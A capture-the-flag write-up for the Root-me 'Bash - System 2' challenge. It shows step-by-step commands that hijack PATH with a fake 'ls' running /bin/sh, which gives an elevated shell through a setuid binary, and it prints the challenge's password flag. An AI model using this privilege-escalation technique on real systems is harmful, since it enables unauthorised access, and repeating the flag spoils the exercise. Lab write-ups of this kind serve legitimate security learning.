Rootme Bash - System 2
Root-me.org
Bash - System 2
Simple Script
Once again we need to get the content of .passwd. This time the script uses ls with some options.
int main(){
system("ls -lA /challenge/app-script/ch12/.passwd");
return 0;
}
We can’t use the previous method because of the options. So this time, we’ll use /bin/sh to create a new shell with the id of app-script-ch12-cracked.
We’ll be creating an executable command called ls that contains /bin/sh. We’re using /bin/sh because it doesn’t drop permissions like bash does.
So since the setuid is set, we’ll get a shell from the user executing the script which is app-script-ch12-cracked.
-r-sr-x--- 1 app-script-ch12-cracked app-script-ch12 7.0K Aug 11 2015 ch12
So we’ll create a new folder, set it to our path then create our new ls.
mkdir -p /tmp/mine
echo "/bin/sh;" > /tmp/mine/ls
chmod +x /tmp/mine/ls
export PATH=/tmp/mine:$PATH
./ch12
id
uid=1312(app-script-ch12) gid=1312(app-script-ch12) euid=1409(app-script-ch12-cracked) groups=1409(app-script-ch12-cracked),100(users),1312(app-script-ch12)
cat .passwd
8a95eDS/*e_T#